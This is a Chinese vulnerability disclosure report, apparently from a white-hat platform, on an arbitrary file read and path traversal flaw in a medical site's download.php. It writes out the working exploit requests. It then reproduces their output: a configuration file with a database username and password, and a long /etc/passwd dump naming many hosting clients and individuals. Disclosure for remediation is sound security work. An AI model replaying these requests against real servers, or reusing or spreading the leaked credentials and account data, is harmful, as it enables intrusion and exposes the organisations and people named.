2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
如题
目标:http://**.**.**.** 。download.php 的 file 参数未对路径做限制,可读取服务器上的任意文件,构造如下请求:
http://**.**.**.**/eng/download.php?file=/eng/download.php
读取配置文件:
http://**.**.**.**/eng/download.php?file=/include/config.php
config.php 内容如下(含数据库账号密码):
// Database// Choose the database to be useddefine('DB_TYPE', 'mysql');// Web Site Namedefine('SITENAME', 'asia medical specialists');// Database Hostname// Hostname of the database server. If you are unsure, 'localhost' works in most cases.define('DB_HOST', 'localhost');// Database Username// Your database user account on the hostdefine('DB_USER', 'ams');// Database Password// Password for your database user accountdefine('DB_PASS', 'cl2cl2');// Database Name// The name of database on the host. The installer will attempt to create the database if not existdefine('DB_NAME', 'ams');// Use persistent connection? (Yes=true No=false)// Default is 'Yes'. Choose 'Yes' if you are unsure.define('DB_PCONNECT', false);// facilitate sending gz-encoded data to web browsers that support compressed web pages// define('GZIP_COMPRESSION', true);define('GZIP_COMPRESSION', true);// SMTP serverdefine('SMTP', '**.**.**.**');// Administrator Name// Name of site administratordefine('SYSTEM_MAIL_SENDER', 'asiamedical specialists');// Administrator Email// Email address of site administratordefine('SYSTEM_MAIL_ADDRESS', 'info@**.**.**.**');// Mail path for templated emaildefine('MAIL_PATH', '/mail/');// Number of rows to display each pagedefine('NUM_ROWS', '20');// Number of rows to display in article pagedefine('NUM_ROWS_ARTICLE', '10');// Current date and time in HKT timezonedefine('TIMEZONE', 8);define('NOW', gmdate('Y-m-d H:i:s', time() + TIMEZONE * 3600));define('TABLE_ADMIN', 'admins');define('TABLE_MENU', 'menus');define('TABLE_PAGE', 'pages');define('TABLE_PAGEXMENU', 'pagesxmenus');define('TABLE_NEWS', 'news');define('TABLE_CAT', 'categories');define('TABLE_ARTICLE', 'articles');define('TABLE_ARTICLEXCAT', 'articlesxcategories');define('TABLE_ARTICLEXNEWS', 'articlesxnews');define('TABLE_BANNER', 'banners');define('TABLE_BANNERXMENU', 'bannersxmenus');define('TABLE_ENROLL', 'enrollments');define('TABLE_PROMOTION', 'promotion');define('TABLE_POPUP', 
'popup');define('TABLE_CROSS_LINK_BANNER', 'link_banner');define('TABLE_SUPPLEMENTARY', 'supplementary');define('TABLE_DOCTORS_SPECIALTY', 'doctors_specialty');define('TABLE_DOCTORS', 'doctors');define('TABLE_CLINIC_LOCATION','clinic_location');define('TABLE_SUBSCRIPT','subscription_box');define('TABLE_TERMS','terms');
通过目录穿越读取 /etc/passwd:
http://**.**.**.**/eng/download.php?file=/../../../../etc/passwd
/etc/passwd 内容如下:
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:daemon:x:2:2:daemon:/sbin:lp:x:4:7:lp:/var/spool/lpd:sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:uucp:x:10:14:uucp:/var/spool/uucp:operator:x:0:0:operator:/root:games:x:12:100:games:/usr/games:gopher:x:13:30:gopher:/usr/lib/gopher-data:ftp:x:14:50:FTP User:/var/ftp:nobody:x:99:99:Nobody:/:xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/falsegdm:x:42:42::/home/gdm:/bin/falsepostgres:x:40:233:PostgreSQL Server:/var/lib/pgsql:/bin/bashmysql:x:101:234:MySQL server:/var/lib/mysql:/bin/bashhei:x:503:502:Cheng Wing Hei:/home/cl2/hei:/bin/bashcl2:x:504:502:**.**.**.**:/home/cl2:/bin/ftponlyttennis:x:505:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyasiaalum:x:507:507:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydsnworks:x:516:511:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlywww997ac:x:519:516:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycdwhy:x:521:518:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyzflites:x:528:523:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytest_cl2:x:530:99:**.**.**.**:/home/cl2/test:/bin/ftponlymanfredwong:x:531:525:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymtmaxtoy:x:537:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlybhkhkcom:x:538:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyaudioforum:x:539:530:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycl2demo:x:544:99:**.**.**.**:/home/cl2/demo:/bin/ftponlycl2ecard:x:545:99:**.**.**.**:/home/cl2/ecard:/bin/ftponlyunbreakable:x:549:535:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyckmetal:x:550:536:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlywww997un:x:553:541:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynewlook:x:554:542:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycl2secure:x:555:99:**.**.**.**:/home/cl2/secure:/bin/ftponlysecred:x:556:99:**.**.**.**:/home/client/**.**.**.*
*:/bin/ftponlydalmatians:x:557:543:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyemperor:x:561:547:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlykone:x:564:550:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyivlhk:x:566:566:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymvt:x:567:553:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponlyalex:x:568:554:alex@**.**.**.**:/home/cl2/alex:/bin/bashconcept:x:571:99:concept.**.**.**.**:/home/client/concept.**.**.**.**:/bin/ftponlynamed:x:25:25:Named:/var/named:/bin/falsees163net:x:506:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlykitime:x:573:558:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytektron:x:574:559:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlypuffin:x:576:561:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyramediacorp:x:578:563:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydeltamac:x:581:565:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponlybluecd:x:583:568:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymanfredw:x:584:521:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyheadlines:x:585:533:**.**.**.**:/home/client/**.**.**.**/**.**.**.**:/bin/ftponlycitibank:x:586:534:citibank.**.**.**.**:/home/client/citibank.**.**.**.**:/bin/ftponlyfishersci:x:588:538:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydeltacom:x:589:544:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlychartslogic:x:591:591:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyadvancepro:x:592:569:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyrpm:x:37:37::/var/lib/rpm:/bin/falsepcap:x:77:77::/var/arpwatch:/sbin/nologinpublic:x:593:502:public:/home/cl2/public:/sbin/nologinisent:x:594:594:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyvcdwonland:x:595:570:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytcmforum:x:597:572:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyiamwaiting:x:598:573:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlypkbox:x:601:576:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyforucorp:x:602:577:**.
**.**.**:/home/client/**.**.**.**:/bin/ftponlyvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinhkweekly:x:603:578:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyheinnaye:x:604:579:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynew-soccer:x:605:580:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynoahgrp:x:606:581:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlysshd:x:74:74::/var/empty/sshd:/bin/falsemusicgal:x:609:609:music-gallery.biz:/home/client/music-gallery.biz:/bin/ftponlyhitmktg:x:611:584:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyorpheusmusic:x:612:612:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyiwake:x:613:613:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyapache:x:48:48:Apache:/var/www:/bin/falsekingsland-cdr:x:615:615:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyleadercorpinfo:x:616:585:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlylefthanded:x:617:617:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyfz9494:x:618:505:fz9494@**.**.**.**:/home/cl2/fz9494:/bin/ftponlygreatwallproductions:x:619:619:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyfeliceperla:x:621:621:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyeternofashion:x:622:622:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlybeautyandthebliss:x:623:623:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlysmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhkpj:x:628:508:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyawayofimagegallery:x:631:512:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyjoe:x:501:502:Joe Li:/home/cl2/joe:/bin/bashupload:x:634:502:File 
Upload:/var/ftp/pub:/bin/ftponlyalvinli:x:636:549:alvinliphoto:/home/client/**.**.**.**:/bin/ftponlybethel:x:637:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyalias:*:7790:2108::/var/qmail/alias:/bin/trueqmaild:*:7791:2108::/var/qmail:/bin/trueqmaill:*:7792:2108::/var/qmail:/bin/trueqmailp:*:7793:2108::/var/qmail:/bin/trueqmailq:*:7794:2107::/var/qmail:/bin/trueqmailr:*:7795:2107::/var/qmail:/bin/trueqmails:*:7796:2107::/var/qmail:/bin/truevpopmail:x:89:89::/home/vpopmail:/bin/bashqscand:x:7797:7797::/home/qscand:/bin/falsenetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashdbus:x:81:81:System message bus:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinfred:x:7798:502::/home/cl2/fred:/bin/bashzelox:x:7799:503::/home/client/**.**.**.**:/bin/bashbababooo:x:7800:503::/home/client/**.**.**.**:/bin/bashvictorywines:x:7801:503::/home/client/**.**.**.**:/bin/bashfruitspassion:x:7802:503::/home/client/fruitspassion:/bin/bashmegint:x:7803:503::/home/client/megint:/bin/bashthirstythursday:x:7804:503::/home/client/**.**.**.**:/bin/bashthirstythuimages:x:7805:503::/home/client/**.**.**.**/public_html/images/:/bin/bashkeepconsulting:x:7806:503::/home/client/**.**.**.**:/bin/bashboutiquewines:x:7807:503::/home/client/**.**.**.**:/bin/bashcl2ssl:x:7808:7808::/home/client/**.**.**.**:/bin/bashstephenngt:x:7809:503::/home/client/**.**.**.**/public_html:/bin/bashspusr:x:7810:503::/home/client/**.**.**.**:/bin/bashhkcarbonreduction:x:7811:503::/home/client/**.**.**.**:/bin/bashchungkiuuser:x:7812:503::/home/client/**.**.**.**:/bin/bashchampagnehouse:x:7813:503::/home/client/**.**.**.**:/bin/bashams:x:7814:503::/home/client/**.**.**.**:/bin/bashislandgolf:x:7815:503::/home/client/**.**.**.**:/bin/bashsagebsl:x:7816:503::/home/client/**.**.*
*.**/public_html:/bin/bashcl2servlet:x:7817:503::/usr/local/tomcat/webapps/ROOT/servlet:/bin/bashclamav:x:102:235:Clam Anti Virus Checker:/var/clamav:/sbin/nologinaplusgift:x:7818:503::/home/client/**.**.**.**/public_html:/bin/bashvigftp:x:7819:503::/home/client/**.**.**.**:/bin/bashcl2freelance:x:7820:7820::/home/cl2/public_html/dchucc/v2:/bin/bashmldw:x:7821:503::/home/client/**.**.**.**:/bin/bashllenergy:x:7822:503::/home/client/**.**.**.**:/bin/bashyouyuan:x:7823:503::/home/client/**.**.**.**:/bin/bashenfalearn:x:7824:503::/home/client/**.**.**.**:/bin/bashtcmforumnet:x:7825:503::/home/client/tcmforumnet:/bin/bashpowerz-entp:x:7826:503::/home/client/**.**.**.**:/bin/bashryan:x:7827:502::/home/cl2/ryan:/bin/bashlions:x:7828:503::/home/client/**.**.**.**/public_html:/bin/bashhkr:x:7829:503::/home/client/**.**.**.**:/bin/bashreginahk:x:7830:503::/home/client/**.**.**.**:/bin/bashnathanaelhk:x:7831:503::/home/client/**.**.**.**:/bin/bashmyroothk:x:7832:503::/home/client/**.**.**.**:/bin/bashgenealogyhk:x:7834:503::/home/client/**.**.**.**:/bin/bashivanhk:x:7835:503::/home/client/**.**.**.**:/bin/bashredgain:x:7836:503::/home/client/**.**.**.**:/bin/bashamssc:x:7837:503::/home/client/**.**.**.**:/bin/bashmegasmart:x:7838:503::/home/client/**.**.**.**:/bin/bashspineandpain:x:7839:503::/home/client/**.**.**.**:/bin/bashytlippo:x:7840:503::/home/client/**.**.**.**:/bin/bashcl2share:x:7841:503::/home/cl2/public_html/cl2share:/bin/bashhkissr:x:7842:503::/home/client/**.**.**.**:/bin/bashripleyhk:x:7843:503::/usr/local/tomcat/webapps/ROOT/ripley:/bin/bashhkgx:x:7844:503::/home/client/**.**.**.**:/bin/bashkennyhuicpa:x:7845:503::/home/client/**.**.**.**:/bin/bashmedicalcatalyst:x:7846:503::/home/client/**.**.**.**:/bin/bashhkr_so:x:7847:503::/home/client/**.**.**.**/public_html2/files/file/so_file:/bin/bashhkr_si:x:7848:503::/home/client/**.**.**.**/public_html2/files/file/si_file:/bin/bashhkgxsports:x:7849:503::/home/client/**.**.**.**:/bin/bash2bglobal:x:7850:503::/home/c
lient/**.**.**.**:/bin/bashwilsoneyehk:x:7851:503::/home/client/**.**.**.**:/bin/bashtcmforumcom20140812:x:7852:503::/home/client/**.**.**.**:/bin/bashcl2usr:x:7853:503::/home/client/**.**.**.**:/bin/bashegltours:x:7854:503::/home/client/**.**.**.**:/bin/bashhkhserc:x:7855:503::/home/cl2/public_html/hkhserc/:/bin/bash
..
危害等级:中
漏洞Rank:10
确认时间:2016-01-14 16:52
已將事件通知有關機構
暂无